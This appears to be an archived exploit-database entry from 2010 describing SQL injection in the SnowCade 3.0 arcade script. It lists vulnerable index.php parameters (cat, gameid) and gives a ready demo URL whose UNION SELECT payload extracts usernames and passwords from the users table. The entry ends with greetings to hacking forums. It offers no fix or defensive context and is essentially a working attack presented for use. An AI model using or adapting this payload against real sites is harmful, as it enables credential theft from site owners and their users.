SnowCade 3.0 - SQL Injection Vulnerability



EDB-ID: 13937 CVE: N/A OSVDB-ID: N/A
Author: ahwak2000 Published: 2010-06-19 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
/*
[-] SnowCade v3 SQL Injection Vulnerability [-]


---Date : 2010-06-19
---Author : ahwak2000
---Email : z.u5[at]hotmail.com
[-] Script Info [-]
---Home : http://www.arcadecreate.com/

[-] Vulnerability [-]


http://site.com/[path]/index.php?action=browse&cat=[SQL INj]



http://site.com/[path]/index.php?action=playgame&gameid=[SQL INj]



http://site.com/[path]/index.php?action=browse&cat=[SQL INj]



[-] DEM0[-]
http://server/snowcade/index.php?action=browse&cat=31%20UNION%20SELECT%201,CONCAT_WS%28CHAR%2832,58,32%29,username,password%29,3,4,5,6+from+users%20limit%201,1--

[-] Greetz to [-]

To All Friends in V4-team Forums And pc.pirate
*/